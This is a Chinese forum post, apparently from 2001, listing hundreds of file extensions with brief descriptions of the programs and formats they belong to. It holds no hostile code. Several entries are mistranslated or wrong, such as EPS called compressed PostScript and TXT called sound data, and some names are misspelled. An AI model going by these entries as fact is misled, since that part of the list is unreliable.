DSM Dynamic Studio音乐模块（MOD）文件
DSP Microsoft Developer Studio工程文件
DSQ Corel QUERY（查询）文件
DST 刺绣机图形文件
DSW Microsoft Developer Studio工作区文件
DTA Word Bank（世界银行）的STARS数据文件
DTD SGML文档类型定义（DTD）文件
DTED 地面高度数字数据（图形的数据格式）文件
DTF Symantec Q&A相关的数据库数据文件
DTM DigiTrakker模块文件
DUN Microsoft拔号网络导出文件
DV 数字视频文件（MIME）
DWD DiamondWare数字化文件
DWG AutoCAD工程图文件；AutoCAD或Generic CADD老版本的绘图格式
DXF 可进行互交换的绘图文件格式，二进制的DWG格式的文本表示；数据交换文件
DXR Macromedia Director受保护（不可编辑）电影文件
D64 Commodore的64位模拟磁盘图像文件
EDA Ensoniq ASR磁盘映像
EDD 元素定义文档（FrameMaker+SGML文档）
EDE Ensoniq EPS磁盘映像
EDK Ensoniq KT磁盘映像
EDQ Ensoniq SQ1/SQ2/Ks32磁盘映像
EDS Ensoniq SQ80磁盘映像
EDV Ensoniq VFX-SD磁盘映像
EFA Ensoniq ASR文件
EFE Ensoniq EPS文件
EFK Ensoniq KT文件
EFQ Ensoniq SQ1/SQ2/Ks32文件
EFS Ensoniq SQ80文件
EFV Ensoniq VFX-SD文件
EMD ABT扩展模块
EMF Windows增强元文件
EML Microsoft Outlook Express邮件消息（MIME RTC822）文件
ENC 重演文件
ENFF 中性文件格式扩展名
EPHTML Perl解释增强HTML文件
EPS 压缩的PostScript图像
EPSF 压缩的PostScript文件
ERI ERWin文件
ERR 当RobooHELP帮助编译器企图编译一个帮助系统源文件时用来存储错误消息的文件
EPX ERWin文件
ESPS ESPS音频文件
EUI Ensoniq ESP家族的压缩磁盘映像

EVY 特使文档
EWL Microsoft Encarta文档
EXC Microsoft Word禁止字字典
EXE 可执行文件（程序）
F FORTRAN文件
F2R Farandoyle线性模块格式
F3R Farandoyle分块线性模块格式
F77 FORTRAN文件
F90 FORTRAN文件
FAR Fradole Composer音乐模块（MOD）文件
FAV Microsoft Outlook导航条
FAX 传真类型图像
FBK Navison 金融备份
FCD 虚拟CD-ROM
FDB Navison 金融数据库
FDF Adobe Acrobat表单文档文件
FEM CADRE有限元素网络文件
FFA，FFL，FFO，FFK Microsoft快速查找文件
FFF GUS PnP银行文件格式
FFT 最终格式文本（IBM的DCA一部分）
FH3 Aldus Freehand 3绘图文件
FIF Fractal图像文件
FIG REND386/AVRIL使用的文件格式
FITS CCD照相机图像；灵活图像传输系统
FLA Macromedia Flash电影
FLC Autodesk FLIC动画文件
FLF Corel Paradox产生的格式：Navison Financials许可文件；OS/2驱动程序文件
PLI Autodesk FLIC动画
FLT StarTrekker音乐模块(MOD)文件；MultiGen Inc的Open Flight使用的文件格式；Corel过滤器文件
FM Adobe FrameMaker文档
FMB Oracle4.0版或以后版本表单的二进制源代码文件
FML 文件镜象列表（GetRight）
FMT Oracle 4.0版或以后版本表单的文本格式；Microsoft Schedule+ 打印文件
FMX Oracle 4.0版或以后版本可执行表单
FND Microsoft Explorer保存的搜索文件（Find applet）
FNG 字体组文件（字体导航器，Font Navigator）
FNK Funk Tracker模块格式
FOG Fontographer模块字体
FON 系统字体
FOR FORTRAN文件
FOT 字体相关文件
FP FileMaker Pro文件
FP1 Flying Pigs for Windows数据文件
FP3 FileMaker Pro文件
FPT FileMaker Pro文件；Microsoft Fox Pro备注字体文件
FPX FlashPix位图
FRM 表单；Frame Maker或Frame Builder文档；Oracle可执行表(3.0版或早期版本)；Visual Basic表单；WordPerfect Merge表单；DataCAD标志报表文件
FRT Microsoft FoxPro报表文件
FRX Visual Basic表单文本；Microsoft FoxPro报表文件
FSF fPrint Audit Tool文件格式
FSL Borland的Paradox 7表单；Corel Paradox保存的表单
FSM Parandoyle示例格式
FT Lotus Notes全文本索引
FTG 全文本搜索组文件，由Windows帮助系统查找时产生——可以删除，并在需要时重建起来
FTS 全文本搜索引文件，由Windows帮助系统查找时产生
FW2 Framework Ⅱ文件
FW3 Framework Ⅲ文件
FW4 Framework Ⅳ文件
FXP 经Microsoft FoxPro编译的源文件
FZB Casio FZ-1银行转储
FZF Casio FZ-1完全转储
FZV Casio FZ-1声音转储
G721 Raw CCITT G.721 $bit ADPCM格式数据
G723 Raw CCITT G.723 3或5bit ADPCM格式数据
GAL Corel多媒体管理器相集
GCD Generic CADD绘画文件（后续版本）
GCP Ground Control Point（地面控制点）文件，用于远景数据形成图像过程，经常用于生成图工程—CHIPS（copenhagen image processing system）使用这些文件
GDB InterBase数据库文件
GDM 铃声、口哨声和声音板模块格式
GED GEDCOM 系谱数据文件，用于记录和交换系谱数据的流行格式；图形环境文档绘画
GEM GEM元文件
GEN Ventura产生的文本文件
GetRight GetRight未完成的下载文件
GFC Patton&Patton FlowCharting 4 flowchart文件
GFI，GFX Genigraphics图形链接表示文件
GHO Norton 克隆磁盘映像
GID Windows 95全局索引文件（包括帮助状态）
GIF CompuServe位图文件
GIM，GIX Genigraphics图形链接介绍文件
GKH Ensoniq EPS家簇磁盘映像文件
GKS Gravis Grip Key文档
GL 动画格式
GNA Genigraphics图形链接介绍文件
GNT 生成代码，Micro Focus属性格式里的可执行代码
GNX Genigraphics图形链接介绍文件
GRA Microsoft Graph文件
GRD 用于远程视景数据产生地图过程的格式文件，通常应用于形成地图工程—CHIPS（copenhagen image processing system）使用这些文件
GRF Grapher（Golden Software公司）图形文件
GRP 程序管理组
GSM Raw GSM 6.10音频流；Raw“byte aligned（比特对齐的）” GSM 6.10音频流；US Robotics语音调制解调器
GTK Graoumftracker（老）音乐模块（MOD）文件
GT2 Graoumftracker（新）音乐模块（MOD）文件
GWX，GWZ Cenigraphis图形链接介绍文件
GZ UNIX gzip压缩文件
H C程序头文件
HCM IBM HCM配置文件
HCOM 声音工具HCOM格式
HCR IBM HCD/HCM产品配置文件
HDF 高级计算机应用程序本地中心（NCSA） geospatial Hierarchial数据格式文件
HED HighEdit文档
HEL Microsoft Hellbender格式保存的游戏文件
HEX Macintosh BinHex2.0文件
HGL HP图形语言绘图文件
HH 映射文件，包括一些话题ID和在帮助文件系统中话题的映射数字—允许运行中应用程序发送给用户合适的上下文帮助话题
HLP 帮助文件；Date CAD Windows帮助文件
HOG Lucas Arts的Dark Forces WAD文件
HPJ Visual Basic帮助工程
HPP C++程序头文件
HQX Macintosh BinHex 4.0文件
HST 历史文件
HT HyperTerminal（超级终端）
HTM，HTML 超文本文档
HTT Microsoft超文本模板
HTX 扩展HTML模板
HXM Descent2 HAM文件扩展
ICA Citrix文件
ICB Targa位图文件
ICC Kodak打印机格式文件
ICL 图标库文件
ICM 图形颜色匹配配置文件
ICO Windows图标
IDB MSDev中间层文件
IDD MIDI设备定义
IDF MIDI设备定义（Windows 95需要的文件）
IDQ Internet数据查询文件
IDX Microsoft FoxPro相关数据库索引文件；Symantec Q&A相关数据库索引文件；Microsoft Outlook Express文件
IFF 交换格式文件；Amiga ILBM
IGES 初始图形交换说明文件
IGF 插入系统元文件
IIF QuickBooks for Windows交换文件
ILBM 位图图形文件
IMA WinImage磁盘映像文件
IMG GEM映像
IMZ WinImage压缩磁盘映像文件
INC 汇编语言或动态服务器包含文件
INF 信息文件
INI 初始化文件；MWave DSP Synth的“nwsynth.ini” GMS安装；Cravis Ultrasound bank安装
INP Oracle 3.0版或早期版本的表单源代码
INRS INRS远程通信声频
INS InstallShield安装脚本；X-Internet签字文件；Ensoniq EPS字簇设备；Cell/ⅡMAC/PC抽样设备
INT 中间代码，当一个源程序经过语法检查后编译产生一个可执行代码
IOF Findit文档
IQY Microsoft Internet查询文件
ISO 根据ISD 9660有关CD-ROM文件系统标准列出CD-ROM上的文件
ISP X-Internet签字文件
IST 数字跟踪设备文件
ISU InstallShield卸装脚本
IT 脉冲跟踪系统音乐模块(MOD)文件
ITI 脉冲跟踪系统设备
ITS 脉冲跟踪系统抽样，Internet文档位置
IV Open Inventor中使用的文件格式
IVD 超过20/20微观数据维数或变量等级文件
IVP 超过20/20的用户子集配置文件
IVT 超过20/20表或集合数据文件
IVX 超过20/20微数据目录文件
IW Idlewild屏幕保护程序
IWC Install Watch文档
J62 Ricoh照相机格式
JAR Java档案文件（一种用于applet和相关文件的压缩文件）
JAVA Java源文件
JBF Paint Shop Pro图像浏览文件
JFF，JFIF，JIF JPEG文件
JMP SAS的JMPDiscovery表格统计文件
JN1 Epic MegaGames的Jill of the Jungle数据文件
JPE，JPEG，JPG JPEG图形文件
JS JavaScript源文件
JSP HTML网页，其中包含有对一个Java servlet的参考
JTF JPEG位图文件
K25 Kurzweil 2500抽样文件
KAR 卡拉OK MIDI文件（文本+MIDI）
KDC Kodak光增强器
KEY DataCAD图标工具条文件
KFX KoFak Group 4图像文件
KIZ Kodak数字明信片文件
KKW RoboHELP帮助工程索引设计器中与主题无关的K开头的所有关键字
KMP Korg Trinity KeyMap文件
KQP Konica照相机本地文件
KR1 Kurzweil 2000抽样（多软驱）文件
KRZ Kurzweil 2000抽样文件
KSF Korg Trinity抽样文件
KYE Kye游戏数据
LAB Visual dBASE标签文件
LBM Deluxe Paint位图文件
LBT，LBX Microsoft FoxPro标签文件
LDB Microsoft Access加锁文件
LDL Corel Paradox分发库
LEG Legacy文档
LES Logitech娱乐系统游戏配置文件（与REC文件一样）
LFT 3D Studio（DOS）放样文件
LGO Paintbrush（Microsoft画图应用程序）的徽标文件
LHA LZH更换文件后缀
LIB 库文件
LIN DataCAD线型文件
LIS 结构化查询报告（SQR）程序产生的输出文件
LLX Laplink交换代理
LNK Windows快捷方式文件
LOG 日志文件
LPD Helix Nut和Bolt文件
LRC Intel可视电话文件
LSL Corel Paradox保存的库文件
LSP AutoLISP、CommonLISP和其他LISP语言文件

[这消息被yunbin编辑过(编辑时间2001-11-24 09:33:15)]
[这消息被yunbin编辑过(编辑时间2001-11-24 09:35:06)]

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-24 09:34:58 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
扩 展 名　　 描 述

LST 列表文件
LU ThoughtWing库单元文件
LVL Parallax Software的 Miner Descent/D2 Level扩展
LWLO Lightwave分层对象文件
LWOB Lightwave对象文件
LWP Lotus WordPro 96/97文件
LWSC Lightwave视景文件
LYR DataCAD层文件
LZH LH ARC压缩档案
LZS Skyroads数据文件
M1V MPEG相关文件(MIME“mpeg”类型)
M3D Corel Motion 3D动画文件
M3U MPEG URL（MIME声音文件）
MAC MacPaint图像文件
MAD Microsoft Access模块文件
MAF Microsoft Access表单文件
MAG 在一些日本文件中发现的图形文件格式
MAGIC 魔力邮件监视器配置文件
MAK Visual Basil或Microsoft Visual C++工程文件
MAM Microsoft Access宏
MAN UNIX手册页输出
MAP 映射文件；Duke Nukem 3D WAD游戏文件
MAQ Microsoft Access查询文件
MAR Microsoft Access报表文件
MAS Lotus Freelance Graphics Smart Master文件
MAT Microsoft Access表；3D Studio MAX材料库
MAUD MAUD抽样格式
MAX Kinetx的3DStudio MAX文件；该格式用于一个3D场景文件；Paperport文件；OrCAD设计文件
MAZ Hover迷路数据；Division的dVS/dVISE使用的文件格式
MB1 Apogee Monster Bash数据文件
MBOX Berkeley Unix邮箱格式
MBX Microsoft Outlook保存email格式；Eudora邮箱
MCC Dailerl0呼叫卡
MCP Metrowerks CodeWarrior工程文件
MCR DataCAD键盘宏文件
MCW Microsoft Word的Macintosh文档
MDA Microsoft Access内抽入器；Microsoft Access 2.0版及其后续版本的工作组事件
MDB Microsoft Access数据库
MDE Microsoft Access MDE文件
MDL 数字跟踪器音乐模块（MOD）文件；Quake模 块文件
MDN Microsoft Access空数据库模板
MDW Microsoft Access工作组文件
MDZ Microsoft Access向导模板文件
MED 音乐编辑器，OctaMED音乐模块（MOD）文件
MER 电子表格/数据库数据交换格式；FileMaker、Excel及其他软件能识别
MET 表示管理器元文件
MFG Pro/ENGINEER制造文件
MGF 在材料与几何学里的文件格式
MHTM，MHTML MHTML文档（MIME）
MI 杂项
MIC Microsoft Image Composer文件
MID MIDI音乐
MIF Adobe FramMaker交换格式
MIFF 与机器无关格式文件
MIM，MIME，MME Internet邮件扩展格式的多用途文件，经常作为发送e-mail时在AOL里附件而创建的文件；在一个多区MIM文件里的文件能用WinZip或其他类似程序打开
MLI 3D Studio的材料库格式文件
MMF Meal Master格式；一个处方类格式；Microsoft邮件文件
MMG 超过20/20表或集会数据文件
MMM Microsoft多媒体电影
MMP Mindmapor Mind Manager文件
MN2 Descent2任务文件
MND，MNI Mandelbort for Windows
MNG 多映像网络图形
MNT,MNX Microsoft FoxPro菜单文件
MNU Visual dBASE菜单文件；Intertel Systems Interact菜单文件
MOD Fast Tracker、Star Trekker、Noise Tracker(等等)音乐模块文件；Microsoft多计划电子表格；Amiga/PC磁道文件
MOV QuickTime for Windows电影
MP2 第二层MPEG音频文件
MP3 第三层MPEG音频文件
MPA MPEG相关文件，MIME“mpeg类型”
MPE，MPEG，MPG MPEG动画文件
MPP Microsoft工程文件；CAD绘图文件格式
MPR Microsoft FoxPro菜单（已编译）
MRI MRI扫描文件
MSA 魔术阴影档案
MSDL Manchester的场景描述语言
MSG Microsoft邮件消息
MSI Windows 安装器包
MSN Microsoft网络文档；Descent Mission文件
MSP Microsoft Paint（画图）位图文件；Windows Installer路径文件
MST Windows 安装器传输文件
MTM Multi 跟踪器音乐模块（MOD）文件
MUL Ultima在线
MUS 音乐
MUS10 Mus10声音
MVB Microsoft多媒体查看器文件
MWP Lotus WordPro 97 Smart Master文件
NAN Nanoscope文件(Raw Grayscale)
NAP NAP元文件
NCB Microsoft Developer Studio文件
NCD Norton改变目录
NCF NetWare命令文件；Lotus Notes内部剪切板
NDO 3D 低多边形建模器，Nendo
netCDF 网络公用数据表单
NFF 中性文件格式
NFT NetObject Fusion模板文件
NIL Norton光标库文件（EasyIcons-兼容）
NIST NIST Sphere声音
NLB Oracle 7数据
NLM NetWare可装载模块
NLS 用于本地化的国家语言支持文件（例如，Uniscape）
NLU Norton Live Update e-mail 触发器文件
NOD NetObject Fusion文件
NSF Lotus Notes数据库
NSO NetObject Fusion文档文件
NST Noise Tracker音乐模块（MOD）文件
NS2 Lotus Notes数据库（第二版）
NTF Lotus Notes数据库模板
NTX CA-Clipper索引文件
NWC Noteworthy Composer歌曲文件
NWS Microsoft Outlook Express新闻消息（MIME RFC822）
O01 台风声音文件
OBD Microsoft Office活页夹
OBJ 对象文件
OBZ Microsoft Office活页夹向导
OCX Microsoft对象链接与嵌入定制控件
ODS Microsoft Outlook Express邮箱文件
OFF 3D 网状物对象文件格式
OFN Microsoft Office FileNew文件
OFT Microsoft Outlook模板
OKT Oktalyzer音乐模块（MOD）文件
OLB OLE对象库
OLE OLE对象
OOGL 面向对象图形库
OPL 组织者编程语言源文件——Psion/Symbian
OPO OPL输出可执行文件
OPT Microsoft Developer Studio文件
OPX OPL扩展DLL（动态链接库）
ORA Oracle 7 配置文件
ORC Oracle 7脚本文件
ORG Lotus Organizer 文件
OR2 Lotus Organizer 2 文件
OR3 Lotus Organizer 97 文件
OSS Microsoft Office查找文件
OST Microsoft Exchange / Outlook 离线文件
OTL Super NoteTab 模板文件
OUT C语言输出文件
P3 Primavera Project Planner（工程设计器）文件
P10 Tektronix Plot 10 绘图文件
P65 PageMaker 6.5文件
P7C Digital ID 文件（MIME）
PAB Microsoft个人地址簿
PAC SB Studio Ⅱ 包
PAK Quake WAD文件
PAL 压缩文件
PART Go！Zilla部分下载文件
PAS Pascal源代码
PAT DataCAD Hatch模式文件；CorelDRAW模式；高级Gravis Ultrasound / Forte 技术；碎片文件
PBD PowerBuilder动态库，作为本地DLL的一个替代物
PBF Turtle Beach的Pinnacle 银行文件
PBK Microsoft PhoneBook（电话簿）
PBL 用于在PowerBuilder开发环境中的PowerBuilder动态库
PBM 可导出位图
PBR PowerBuilder资源
PCD Kodak Photo-CD映像；P-Code编译器测试脚本，由Microsoft测试与Microsoft Visual测试
PCE Maps Eudora邮箱名字的DOS文件名
PCL Hewlett-Packard 打印机控制语言文件（打印机备用位图）
PCM 声音文件格式；OKI MSM6376 合成芯片 PCM格式
PCP Symantec Live Update Pro文件
PCS PICS动画文件
PCT Macintosh PICT绘画文件
PCX Zsoft PC画笔位图
PDB 3Com PalmPilot数据库文件
PDD 可以用Paint Shop Pro或其他图像处理软件打开的图形图像
PDF Adobe Acrobat 可导出文档格式文件（可用Web浏览器显示）；Microsoft系统管理服务器包定义文件；NetWare打印机定义文件
PDP Broderbund的Print Shop Deluxe文件
PDQ Patton&Patton Flowercharting PDQ Lite 文件
PDS 摄影图像文件（该文件格式的来源不清楚）
PF Aladdin系统对私人文件进行加密的文件
PFA 类型1字体（ASCⅡ）
PFB 类型1字体（二进制）
PFC PF组件
PFM 打印机字体尺度
PGD 良好隐私（Pretty Good Privacy，PGP）虚拟磁盘文件
PGL HP绘图仪绘图文件
PGM 可输出灰度图（位图）
PGP 用良好隐私（PGP）算法加密文件
PH 由Microsoft帮助文件编译器产生的临时文件
PHP，PHP3 包含有PHP脚本的HTML网页
PHTML 包含有PHP脚本的HTML网页；由Perl分析解释的HTML
PIC PC画图位图；Lotus图片；Macintosh PICT绘图
PICT Macintosh PICT图形文件
PIF 程序信息文件；IBM PIF绘图文件
PIG LucasArts的Dark Forces WAD文件
PIN Epic Pinball数据文件
PIX 内置系统位图
PJ MKS源完整性文件
PJX，PJT Microsoft Visual FoxPro工程文件
PKG Microsoft Developer Studio应用程序扩展（与DLL文件类似）
PKR PGP的公用钥匙环
PL Perl程序
PLG 由REND386/AVRIL使用的文件格式
PLI Oracle 7数据描述
PLM Discorder Tracker2模块
PLS Disorder Tracker2抽样文件；MPEG PlayList文件（由WinAmp使用）
PLT HPGL绘图仪绘图文件；AutoCAD plot绘图文件；Gerber标志制作软件
PM5 Pagemaker 5.0文件
PM6 Pagemaker 6.0文件
PNG 可移植的网络图形位图；Paint Shop Pro浏览器目录
PNT，PNTG MacPaint图形文件
POG Descent2 PIG文件扩展
POL Windows NT策略文件
POP Visual dBASE上托文件
POT Microsoft Powerpoint模块
POV 视频射线跟踪器暂留
PP4 Picture Publisher 4位图
PPA Microsoft Powerpoint内插器
PPF Turtle Beach的Pinnacle程序文件
PPM 可移植的象素映射位图
PPP Parson Power Publisher；Serif PagePlus桌面出版缺省输出
PPS Microsoft Powerpoint幻灯片放映
PPT Microsoft Powerpoint演示文稿
PQI PowerQuest驱动器图像文件
PRC 3COM PalmPiltt资源（文本或程序）文件
PRE Lotus Freelance演示文稿
PRF Windows系统文件，Macromedia导演设置文件
PRG dBASE Clipper和FoxPro程序源文件；WAVmaker程序
PRJ 3D Studio（DOS）工程文件
PRN 打印表格（用空格分隔的文本）；DataCAD Windows打印机文件
PRP Oberson的Prospero数据转换产品保存的工程文件
PRS Harvard Graphics for Windows演示文件
PRT 打印格式化文件；Pro/ENGINEER元件文件
PRV PsiMail Internet提供者模板文件
PRZ Lotus Freelance Graphics 97文件
PS Postscript格式化文件（PostScript打印机可读文件）
PSB Pinnacle Sound Bank
PSD Adobe photoshop位图文件
PSI PSION a-Law声音文件
PSM Protracker Studio模型格式；Epic游戏的源数据文件
PSP Paint Shop Pro图像文件
PST Microsoft Outlook个人文件夹文件
PTD Pro/ENGINEER表格文件
PTM Polytracker音乐模块（MOD）文件
PUB Ventura Publisher出版物；Microsoft Publisher文档
PWD Microsoft Pocket Word文档
PWL Windows 95口令列表文件
PWP Photoworks图像文件（能被Photoworks浏览的一系列文件）
PWZ Microsoft Powerpoint向导
PXL Microsoft Pocket Excel电子表格
PY 来自Yahoo的电子消息；Python脚本文件
PYC Python脚本文件
QAD PF QuickArt文档
QBW QuickBooks for Windows文件
QDT 来自Quicken UK的QuickBooks数据文件，帐目/税/货单程序
QD3D Apple的QuickDraw 3D元文件格式
QFL FAMILY LAWYER文档
QIC Microsoft备份文件
QIF QuickTime相关图像（MIME）；Quicken导入文件
QLB Quick库
QM Quality Motion文件
QRY Microsoft查询文件
QST Quake Spy Tab文件
QT，QTM QuickTime电影
QTI，QTIF QuickTime相关图像
QTP QuickTime优先文件
QTS Mac PICT图像文件；QuickTime相关图像
QTX QuickTime相关图像
QW Symantec Q&A Write程序文件
QXD Quark XPress文件
R Pegasus邮件资源文件
RA RealAudio声音文件
RAM RealAudio元文件
RAR RAR压缩档案（Eugene Roshall格式）
RAS Sun光栅图像位图
RAW RAW文件格式（位图）；Raw标识的PCM数据
RBH 由RoboHELP维持的RBH文件，它加入到一个帮助工程文件的信息中
RDF 资源描述框架文件（涉及XML和元数据）
RDL Descent注册水平文件
REC 录音机宏；RapidComm声音文件
REG 注册表文件
REP Visual dBASE报表文件
RES Microsoft Visual C++资源文件
RFT 可修订的表单文本（IBM的DCA一部分或文档内容框架结构一部分）
RGB，SGI Silicon图形RGB文件
RLE Run-Length编码的位图
RL2 Descent2注册水平文件
RM RealAudio视频文件
RMD Microsoft RegMaid文档
RMF Rich Map格式（3D游戏编辑器使用它来保存图）
RMI M1D1音乐
ROM 基于盒式磁带的家庭游戏仿真器文件（来自Atari 2600、Colecovision、Sega、Nintendo等盒式磁带里的ROM完全拷贝，在两个仿真器之间不可互修改）
ROV Rescue Rover数据文件
RPM RedHat包管理器包（用于Linux）
RPT Microsoft Visual Basic Crystal报表文件
RRS Ace game Road Rash保存的文件
RSL Borland的Paradox 7报表
RSM WinWay Resume Writer恢复文件
RTF Rich Text格式文档
RTK RoboHELP使用的用来模拟Windows帮助的搜索功能
RTM Real Tracker音乐模块（MOD）文件
RTS RealAudio的RTSL文档；RoboHELP对复杂操作进行加速
RUL InstallShield使用的扩展名
RVP Microsoft Scan配置文件（MIME）
Rxx 多卷档案上的RAR压缩文件（xx= 1～99间的一个数字）
S 汇编源代码文件
S3I Scream Tracker v3设备
S3M Scream Tracker v3的声音模块文件
SAM Ami专业文档；8位抽样数据
SAV 游戏保存文件
SB 原始带符号字节（8位）数据
SBK Creative Labs的Soundfont 1.0 Bank文件；(Soundblaster)/EMU SonndFont v1.x Bank文件
SBL Shockwave Flash对象文件
SC2 Microsoft Schedule+7文件格式；SAS目录（Windows 95/NT、OS/2、Mac）
SC3 SimCity 3000保存的游戏文件
SCC Microsoft Source Safe文件
SCD Matrix/Imapro SCODL幻灯片图像；Microsoft Schedule +7
SCF Windows Explorer命令文件
SCH Microsoft Schedule+1
SCI ScanVec Inspire本地文件格式
SCN True Space 2场景文件
SCP 拨号网络脚本文件
SCR Windows屏幕保护；传真图像；脚本文件
SCT SAS目录（DOS）；Scitex CT位图；Microsoft FoxPro表单
SCT01 SAS目录（UNIX）
SCV ScanVec CASmate本地文件格式
SCX Microsoft FoxPro表单文件
SD Sound Designer 1声音文件
SD2 Sound Designer 2展平文件/数据分叉指令；SAS数据库（Windows 95/NT、OS/2、Mac）
SDF 系统数据文件格式—Legacy Unisys（Sperry）格式
SDK Roland S—系列软盘映像
SDL Smart Draw库文件
SDR Smart Draw绘图文件
SDS 原始Midi抽样转储标准文件
SDT SmartDraw模板
SDV 分号分隔的值文件
SDW Lotus WordPro图形文件；原始带符号的DWORD（32位）数据
SDX 由SDX压缩的Midi抽样转储标准文件
SEA 自解压档案（Stufflt for Macintosh或其他软件使用的文件）
SEP 标签图像文件格式（TIFF）位图
SES Cool Edit Session文件（普通数据声音编辑器文件）
SF IRCAM声音文件格式
SF2 Emu Soundfont v2.0文件；Creative Labs的Soundfont 2.0 Bank文件（Sound Blaster）
SFD SoundStage声音文件数据
SFI Sound Stage声音文件信息
SFR Sonic Foundry Sample资源
SFW Seattle电影工程（损坏的JPEG）
SFX RAR自解压档案
SGML 标准通用标签语言
SHB Corel Show演示文稿；文档快捷文件
SHG 热点位图
SHP 3D Studio（DOS）形状文件；被一些应用程序用于多部分交互三角形模型的3D建模
SHS Shell scrap文件；据载用于发送“口令盗窃者”
SHTML 含有服务器端包括（SSI）的HTML文件
SHW Corel Show演示文稿
SIG 符号文件
SIT Mac的StuffIt档案文件
SIZ Oracle 7配置文件
SKA PGP秘钥
SKL Macromedia导演者资源文件
SL PACT的保存布局扩展名
SLB Autodesk Slide库文件格式
SLD Autodesk Slide文件格式
SLK Symbolic Link（SYLK）电子表格
SM3 DataCAD标志文件
SMP Samplevision格式；Ad Lib Gold抽样文件
SND NeXT声音；Mac声音资源；原始的未符号化的PCM数据；AKAI MPC系列抽样文件
SNDR Sounder声音文件
SNDT Sndtool声音文件
SOU SB Studio Ⅱ声音
SPD Speech数据文件
SPL Shockwave Flash对象；DigiTrakker抽样
SPPACK SPPack声音抽样
SPRITE Acorn的位图格式
SQC 结构化查询语言（SQR）普通代码文件
SQL Informix SQL查询；通常被数据库产品用于SQL查询（脚本、文本、二进制）的文件扩展名
SQR 结构化查询语言（SQR）程序文件
SSDO1 SAS数据集合（UNIX）
SSD SAS数据库（DOS）
SSF 可用的电子表格文件
ST Atari ST磁盘映像
STL Sterolithography文件
STM .shtml的短后缀形式，含有一个服务端包括（SSI）的HTML文件；Scream Tracker V2音乐模块（MOD）文件
STR 屏幕保护文件
STY Ventura Publisher风格表
SVX Amiga 8SVX声音；互交换文件格式，8SVX/16SV
SW 原始带符号字（16位）数据
SWA 在Macromedia导演文件（MP3文件）中的Shockwave声音文件
SWF Shockwave Flash对象
SWP DataCAD交换文件
SYS 系统文件
SYW Yamaha SY系列波形文件
T64 Commodore 64仿真器磁带映像文件
TAB Guitar表文件
TAR 磁带档案
TAZ UNIX gzip/tape档案
TBK Asymetrix Toolbook交互多媒体文件
TCL 用TCL/TK语言编写的脚本
TDB Thumbs Plus数据库
TDDD Imagine 和 Turbo Silver射线跟踪器使用的文件格式
TEX 正文文件
TGA Targa位图
TGZ UNIX gzip/tap档案文件
THEME Windows 95桌面主题文件
THN Graphics WorkShop for Windows速写
TIF，TIFF 标签图像文件格式（TIFF）位图
TIG 虎形文件，美国政府用于分发地图
TLB OLE类型库
TLE 两线元素集合（NASA）
TMP Windows临时文件
TOC Eudora邮箱内容表
TOL Kodak照片增强器
TOS Atari 16/32和32/32计算机操作系统文件
TPL CakeWalk声音模板文件；DataCAD模板文件
TPP Teleport Pro工程
TRK Kermit脚本文件
TRM 终端文件
TRN MKS源完整性工程用法日志文件
TTF TrueType字体文件
TTK Corel Catalyst Translaton Tool Kit
TWF TabWorks文件
TWW Tagwrite模板
TX8 MS-DOS文本
TXB Descent/D2编码概要文件
TXT ASCⅡ文本格式的声音数据
TXW Yamaha TX16W波形文件
TZ 老的压缩格式文件
T2T Sonate CAD建模软件文件
UB 原始未符号化的字节（8位）数据
UDF Windows NT/2000唯一性数据库文件
UDW 原始未符号化的双字（32位）数据
ULAW 美国电话格式（CCITT G.711）声音
ULT Ultra Tracker音乐模块（MOD）文件
UNI MikMod UniMod格式化文件
URL Internet快捷方式文件
USE MKS源完整性文件
UU，UUE UU编码文件
UW 原始未符号化字（16位）数据
UWF UltraTracker波形文件
V8 Covox 8位声音文件
VAP 加注讲演文件
VBA VBase文件
VBP Microsoft Visual Basic工程文件
VBW Microsoft Visual Basic工作区文件
VBX Microsoft Visual Basic用户定制控件
VCE Natural MicroSystems（NMS）未格式化声音文件（由Cool Edit使用）
VCF 虚拟卡文件（Netscape）；Veri配置文件；为与Sense8的WordToolkit一起使用而定义对象
VCT，VCX Microsoft FoxPro类库
VDA Targa位图
VI National Instruments LABView产品的虚拟设备文件
VIFF Khoros Visualisation格式
VIR Norton Anti-Virus或其他杀毒产品用于标识被病毒感染的文件
VIV VivoActive Player流视频文件
VIZ Division的dVS/dVISE文件
VLB CorelVentura库
VMF FaxWorks声音文件
VOC Creative Labs的Sound Blaster声音文件
VOX 用ADPCM编码的对话声音文件；Natural MicroSystems（NMS）格式化声音文件，Talking Technology声音文件
VP Ventura Publisher出版物
VQE，VQL Yamaha Sound-VQ定位器文件
VQF Yamaha Sound-VQ文件（可能出现标准）
VRF Oracle 7配置文件
VRML 虚拟现实建模语言文件
VSD Visio绘画文件（流程图或图解）
VSL 下载列表文件（GetRight）
VSN Windows 9x/NT Virusafe版文件，用于保持有关目录中所有信息，当一个文件被访问，其中信息与VSN信息进行比较，以确保它们保持一致
VSS Visio模板文件
VST Targa位图
VSW Visio工作区文件
VXD Microsoft Windows虚拟设备驱动程序
W3L W3Launch文件
WAB Microsoft Outlook文件
WAD 包含有视频、玩家水平和其他信息的DOOM游戏的大文件
WAL Quake 2正文文件
WAV Windows波形声形
WB1，WB2 QuattoPro for Windows电子表格
WBK Microsoft Word备份文件
WBL Argo WebLoadⅡ上载文件
WBR Crick Software的WordBar文件
WBT Crick Software的WordBar模板
WCM WordPerfect宏
WDB Microsoft Works数据库
WDG War FTP远程守护者文件
WEB CorelXARA Web文档
WFB Turtle Beach的Wavefont Bank（Maui/Rio/Monterey）
WFD Turtle Beach的Wavefont Drum集合（Maui/Rio/Monterey）
WFM Visual dBASE Windows表单
WFN 在CorelDRAW中使用的符号
WFP Turtle Beach的Wavefont程序（Maui/Ri/Monterey）
WGP Wild Board游戏数据文件
WID Ventura宽度表
WIL WinImage文件
WIZ Microsoft Word向导
WK1 Lotus 1-2-3版第1、2版的电子表格
WK3 Lotus 1-2-3版第3版的电子表格
WK4 Lotus 1-2-3版第4版的电子表格
WKS Lotus 1-2-3电子表格；Microsoft Works文档
WLD REND386/AVRIL文件
WLF Argo WebLoadⅠ上载文件
WLL Microsoft Word内插器
WMF Windows元文件
WOW Grave Composer音乐模块（MOD）文件
